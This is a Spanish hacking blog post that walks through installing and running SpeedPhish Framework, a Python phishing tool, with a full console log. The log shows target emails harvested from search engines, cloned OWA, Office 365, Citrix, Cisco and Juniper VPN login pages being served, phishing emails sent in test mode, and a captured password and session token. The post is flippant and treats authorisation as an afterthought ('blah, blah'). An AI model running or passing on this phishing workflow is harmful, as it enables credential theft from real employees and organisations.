Realiza ataques de phishing en un santiamén con SPF (SpeedPhish Framework)

¿Estás en el chiringuito de playa y sientes la necesidad de juakear a algo o a alguien?, ¿sientes la llamada de la ingeniería social? ¿qué tal un phishing rápido?. Déjame decirte primero que estás enfermo... y luego hablarte de SPF (SpeedPhish Framework), una herramienta escrita en python diseñada para realizar un rápido reconocimiento y desarrollo de phishings. Así que levanta la tapa de tu netbook y empieza a teclear...

Requisitos & instalación

apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone


cd spf
python --all -d (si has configurado previamente la pasarela SMTP y no quieres mandar los correos a las víctimas usa mejor --test)

[!] A CONFIG FILE was not specified...  defaulting to [default.cfg]


[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet

[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file

[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] ----------

[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/
[*] [VERBOSE] /home/vmotos/SPF/spf/
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on []
[*] [VERBOSE] Started website [citrix2   ] on []
[*] [VERBOSE] Started website [junipervpn] on []
[*] [VERBOSE] Started website [owa       ] on []
[*] [VERBOSE] Started website [office365 ] on []
[*] [VERBOSE] Started website [citrix    ] on []
[*] [VERBOSE] Created VHOST [ ] -> []
[*] [VERBOSE] Created VHOST [   ] -> []
[*] [VERBOSE] Created VHOST [] -> []
[*] [VERBOSE] Created VHOST [       ] -> []
[*] [VERBOSE] Created VHOST [ ] -> []
[*] [VERBOSE] Created VHOST [    ] -> []
[*] [VERBOSE] Started WebServer with pid = [5077]

[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG]   Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG]   Found the following email template: [templates/email/office365.txt]
[*] [DEBUG]   Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG]   Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG]   Found the following email template: [templates/email/owa.txt]

[*] Sending phishing emails
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to []
[*] Would have sent an email to [] with subject of [Updated Citrix Server], but this was just a test.

[*] Monitoring phishing website activity!

Ahora ábrete otra cervezita y a esperar...

[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],,password=['prueba123'], user=[''], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']


pd. Ni que decir tiene que el phishing ha de hacerse tras previa autorización del dueño o responsable correspondiente del dominio y blah, blah,... ¡sed buenos!
